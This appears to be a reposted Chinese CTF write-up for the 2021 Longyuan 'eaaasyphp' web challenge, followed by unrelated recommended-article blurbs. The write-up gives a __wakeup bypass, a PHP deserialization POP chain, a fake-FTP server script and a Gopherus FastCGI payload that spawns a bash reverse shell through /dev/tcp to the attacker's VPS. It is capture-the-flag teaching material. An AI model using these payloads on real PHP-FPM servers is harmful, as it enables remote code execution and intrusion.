当前位置: 开发笔记 > 编程语言 > 正文

陇原战“疫“2021网络安全大赛Webeaaasyphp

作者：我叫博小微 | 来源：互联网 | 2023-08-13 06:04

eaaasyphp文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接题目给出了源码读取phpinfo尝试反序列化读取phpinfo但

eaaasyphp

文章目录

eaaasyphp
- 读取phpinfo
- 打fastcgi
- 恶意的ftp服务
- 构造pop链
- 参考链接

题目给出了源码

读取phpinfo

尝试反序列化读取phpinfo

但是__wakeup()函数先于destruct函数执行&＃xff0c;所以需要绕过:__

PHP :: Bug #81151 :: bypass __wakeup

?code&＃61;C:4:"Hint":0:{}

注意这个FPM/FastCGI

打fastcgi

使用Gopherus生成打fastcgi的payload:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_ PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCR IPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp /vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

同时还要在自己的vps上起一个恶意的ftp服务

恶意的ftp服务

ftp服务

# evil_ftp.py import socket s &＃61; socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((&＃39;0.0.0.0&＃39;, 7008)) s.listen(1) conn, addr &＃61; s.accept() conn.send(b&＃39;220 welcome\n&＃39;) #Service ready for new user. #Client send anonymous username #USER anonymous conn.send(b&＃39;331 Please specify the password.\n&＃39;) #User name okay, need password. #Client send anonymous password. #PASS anonymous conn.send(b&＃39;230 Login successful.\n&＃39;) #User logged in, proceed. Logged out if appropriate. #TYPE I conn.send(b&＃39;200 Switching to Binary mode.\n&＃39;) #Size / conn.send(b&＃39;550 Could not get the file size.\n&＃39;) #EPSV (1) conn.send(b&＃39;150 ok\n&＃39;) #PASV conn.send(b&＃39;227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n&＃39;) #STOR / (2) conn.send(b&＃39;150 Permission denied.\n&＃39;) #QUIT conn.send(b&＃39;221 Goodbye.\n&＃39;) conn.close()

构造pop链

构造pop链触发Bunny类中的file_put_contents

unserialize——>Bypass类的__destruct()函数——>Welcome类的__invoke()函数——>Bunny类的__toString()函数——>调用其file_put_contents()打内网的fpm

(vps自行修改)

class Check {public static $str1 &＃61; false;public static $str2 &＃61; false; }class Esle {public function __wakeup(){Check::$str1 &＃61; true;} }class Hint {public function __wakeup(){$this->hint &＃61; "no hint";}//这里可以利用得到phpinfo&＃xff08;&＃xff09;,前提是绕过__wakeup()&＃xff0c;将O换为C即可绕过public function __destruct(){if(!$this->hint){$this->hint &＃61; "phpinfo";($this->hint)();}} }class Bunny {//当一个对象被当作字符串对待的时候&＃xff0c;会触发这个__toString()魔术方法//比如$b &＃61; new Bunny();那么 echo $b; 就会调用__toString这个方法public function __toString(){if (Check::$str2) {if(!$this->data){$this->data &＃61; $_REQUEST[&＃39;data&＃39;];}//写入文件但是题目把写文件的权限给删掉了&＃xff0c;所以这个思路不通//可以配合ftp打内网的fpmfile_put_contents($this->filename, $this->data);} else {throw new Error("Error");}} }class Welcome {//当以调用函数的方式&＃xff0c;调用一个对象时&＃xff0c;__invoke函数会被自动调用//比如$a &＃61; new Welcome(),那么进行 $a()的时候就会调用__invoke()函数//而上述用法可以在Bypass中进行利用public function __invoke(){Check::$str2 &＃61; true;return "Welcome" . $this->username;} }class Bypass {public $aaa;public function __destruct(){if (Check::$str1) {//另str4为一个Welcome的类对象&＃xff0c;调用其__invoke()函数($this->str4)();} else {throw new Error("Error");}} }$a &＃61; new Bypass(); $a->aaa &＃61; new Esle(); $a->str4 &＃61; new Welcome(); $a->str4->username &＃61; new Bunny(); $a->str4->username->filename &＃61; "ftp://aaa&＃64;vps:7008/123"; echo urlencode(serialize($a));/* if (isset($_GET[&＃39;code&＃39;])) {unserialize($_GET[&＃39;code&＃39;]); } else {highlight_file(__FILE__); }*/

打内网的fpm这一点类似于[蓝帽杯2021 one point php]&＃xff1a;[蓝帽杯 2021]One Pointer PHP_Sk1y的博客-CSDN博客

payload&＃xff08;vps自行修改&＃xff09;

?code&＃61;O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A3%3A%22aaa%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Ds%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A33%3A%22ftp%3A%2F%2Faaa%40116.62.240.148%3A7008%2F123%22%3B%7D%7D%7D&data&＃61;%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

运行ftp.py&＃xff0c;在vps的7008端口开启ftp恶意服务

python3 ftp.py

监听vps的7777端口&＃xff0c;

参考链接

PHP :: Bug #81151 :: bypass __wakeup
陇原战疫2021网络安全大赛 Web_feng的博客-CSDN博客
One Pointer PHP_Sk1y的博客-CSDN博客

推荐阅读

http
Web学习历程记录（七）——Tomcat基本概念和配置

本文介绍了Web学习历程记录中关于Tomcat的基本概念和配置。首先解释了Web静态Web资源和动态Web资源的概念，以及C/S架构和B/S架构的区别。然后介绍了常见的Web服务器，包括Weblogic、WebSphere和Tomcat。接着详细讲解了Tomcat的虚拟主机、web应用和虚拟路径映射的概念和配置过程。最后简要介绍了http协议的作用。本文内容详实，适合初学者了解Tomcat的基础知识。 ... [详细]

蜡笔小新 2023-12-13 17:08:24
md5
南邮ctf-web的writeup

本文介绍了南邮ctf-web的writeup，包括签到题和md5 collision。在CTF比赛和渗透测试中，可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型，可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]

蜡笔小新 2023-12-13 10:58:55
int
李逍遥寻找仙药的迷阵之旅

本文讲述了少年李逍遥为了救治婶婶的病情，前往仙灵岛寻找仙药的故事。他需要穿越一个由M×N个方格组成的迷阵，有些方格内有怪物，有些方格是安全的。李逍遥需要避开有怪物的方格，并经过最少的方格，找到仙药。在寻找的过程中，他还会遇到神秘人物。本文提供了一个迷阵样例及李逍遥找到仙药的路线。 ... [详细]

蜡笔小新 2023-12-12 13:59:33
int
微软头条实习生分享深度学习自学指南

本文介绍了一位微软头条实习生自学深度学习的经验分享，包括学习资源推荐、重要基础知识的学习要点等。作者强调了学好Python和数学基础的重要性，并提供了一些建议。 ... [详细]

蜡笔小新 2023-12-14 20:58:32
int
伊振华作品 | 沈阳市智慧城市运行管理中心的设计与建设

本文介绍了设计师伊振华受邀参与沈阳市智慧城市运行管理中心项目的整体设计，并以数字赋能和创新驱动高质量发展的理念，建设了集成、智慧、高效的一体化城市综合管理平台，促进了城市的数字化转型。该中心被称为当代城市的智能心脏，为沈阳市的智慧城市建设做出了重要贡献。 ... [详细]

蜡笔小新 2023-12-14 16:35:39
int
使用多进程实现TCP服务端的优势和注意事项

本文介绍了为什么要使用多进程处理TCP服务端，多进程的好处包括可靠性高和处理大量数据时速度快。然而，多进程不能共享进程空间，因此有一些变量不能共享。文章还提供了使用多进程实现TCP服务端的代码，并对代码进行了详细注释。 ... [详细]

蜡笔小新 2023-12-13 18:25:30
int
Golang如何使用Cookie跟踪位置

关键词：Golang, Cookie, 跟踪位置, net/http/cookiejar, package main, golang.org/x/net/publicsuffix, io/ioutil, log, net/http, net/http/cookiejar ... [详细]

蜡笔小新 2023-12-13 15:47:22
buffer
java 模拟get post请求_Java后台模拟发送http的get和post请求，并测试

个人学习使用：谨慎参考1Client类importcom.thoughtworks.gauge.Step;importcom.thoughtworks.gauge.T ... [详细]

蜡笔小新 2023-12-13 14:20:23
int
Python瓦片图下载、合并、绘图、标记的代码示例

本文提供了Python瓦片图下载、合并、绘图、标记的代码示例，包括下载代码、多线程下载、图像处理等功能。通过参考geoserver，使用PIL、cv2、numpy、gdal、osr等库实现了瓦片图的下载、合并、绘图和标记功能。代码示例详细介绍了各个功能的实现方法，供读者参考使用。 ... [详细]

蜡笔小新 2023-12-13 12:14:55
int
利用Visual Basic开发SAP接口程序初探的方法与原理

本文介绍了利用Visual Basic开发SAP接口程序的方法与原理，以及SAP R/3系统的特点和二次开发平台ABAP的使用。通过程序接口自动读取SAP R/3的数据表或视图，在外部进行处理和利用水晶报表等工具生成符合中国人习惯的报表样式。具体介绍了RFC调用的原理和模型，并强调本文主要不讨论SAP R/3函数的开发，而是针对使用SAP的公司的非ABAP开发人员提供了初步的接口程序开发指导。 ... [详细]

蜡笔小新 2023-12-13 10:56:31
int
WebSocket与Socket.io的理解

WebSocketprotocol是HTML5一种新的协议。它的最大特点就是，服务器可以主动向客户端推送信息，客户端也可以主动向服务器发送信息，是真正的双向平等对话，属于服务器推送 ... [详细]

蜡笔小新 2023-12-12 19:35:15
int
Go语言实现堆排序的详细教程

本文主要介绍了Go语言实现堆排序的详细教程，包括大根堆的定义和完全二叉树的概念。通过图解和算法描述，详细介绍了堆排序的实现过程。堆排序是一种效率很高的排序算法，时间复杂度为O(nlgn)。阅读本文大约需要15分钟。 ... [详细]

蜡笔小新 2023-12-12 16:23:00
int
解决nginx启动报错epoll_wait() reported that client prematurely closed connection的方法

本文介绍了解决nginx启动报错epoll_wait() reported that client prematurely closed connection的方法，包括检查location配置是否正确、pass_proxy是否需要加“/”等。同时，还介绍了修改nginx的error.log日志级别为debug，以便查看详细日志信息。 ... [详细]

蜡笔小新 2023-12-12 13:19:04
int
JDK源码学习之HashTable(附带面试题)的学习笔记

本文介绍了JDK源码学习之HashTable(附带面试题)的学习笔记，包括HashTable的定义、数据类型、与HashMap的关系和区别。文章提供了干货，并附带了其他相关主题的学习笔记。 ... [详细]

蜡笔小新 2023-12-12 13:05:17
jsp
移动端常用单位——rem的使用方法和注意事项

本文介绍了移动端常用的单位rem的使用方法和注意事项，包括px、%、em、vw、vh等其他常用单位的比较。同时还介绍了如何通过JS获取视口宽度并动态调整rem的值，以适应不同设备的屏幕大小。此外，还提到了rem目前在移动端的主流地位。 ... [详细]

蜡笔小新 2023-12-12 07:20:50

我叫博小微

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章